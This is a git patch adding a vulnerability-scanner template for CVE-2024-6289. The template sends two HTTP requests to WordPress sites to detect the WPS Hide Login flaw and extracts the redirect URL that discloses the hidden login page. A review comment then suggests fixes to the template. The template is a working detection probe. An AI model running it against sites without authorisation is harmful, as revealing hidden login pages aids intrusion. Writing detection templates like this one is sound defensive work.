From 4b77efe4b8629265159e52f95cc483f6f10b19e4 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Mon, 15 Jul 2024 21:23:47 +0300
Subject: [PATCH] add CVE-2024-6289
---
http/cves/2024/CVE-2024-6289.yaml | 46 +++++++++++++++++++++++++++++++
1 file changed, 46 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-6289.yaml
diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml
new file mode 100644
index 0000000000..ba918d7caf
--- /dev/null
+++ b/http/cves/2024/CVE-2024-6289.yaml
@@ -0,0 +1,46 @@
+id: CVE-2024-6289
+
+info:
+ name: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure
+ author: securityforeveryone
+ severity: medium
+ description: |
+ The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
+ reference:
+ - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-6289
+ - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
+ classification:
+ epss-score: 0.00043
+ epss-percentile: 0.09266
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: wpserveur
+ product: wps_hide_login
+ framework: wordpress
+ publicwww-query: "/wp-content/plugins/wps-hide-login/"
+ tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress
+
+http:
+ - raw:
+ - |
+ GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /?gf_page=randomstring HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_1,"WPS Hide Login") && status_code_1 == 200'
+ - '!contains(tolower(location_2), "wp-login.php")'
+ - 'contains(header_2,"%2F%3Fgf_page%3Drandomstring&reauth=1")'
+ condition: and
+
+ extractors:
+ - type: kval
+ kval:
+ - location
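Review bot: `max-request: 1` under `metadata` does not match the two raw requests this template sends (the `readme.txt` probe and the `gf_page` probe); it should read `max-request: 2` so the declared request count reflects what a scan actually issues. The match on the second response rests only on header substrings, so adding a status term such as `status_code_2 == 302` (presumably the code the redirect returns; confirm against a test instance) would tie it to an actual redirect and reduce false positives. The `classification` block also has no `cve-id: CVE-2024-6289` entry, which templates under `http/cves/` normally carry next to the EPSS fields. Because the `kval` extractor prints the `location` value, scan output will contain the site's hidden login URL and should be handled as sensitive.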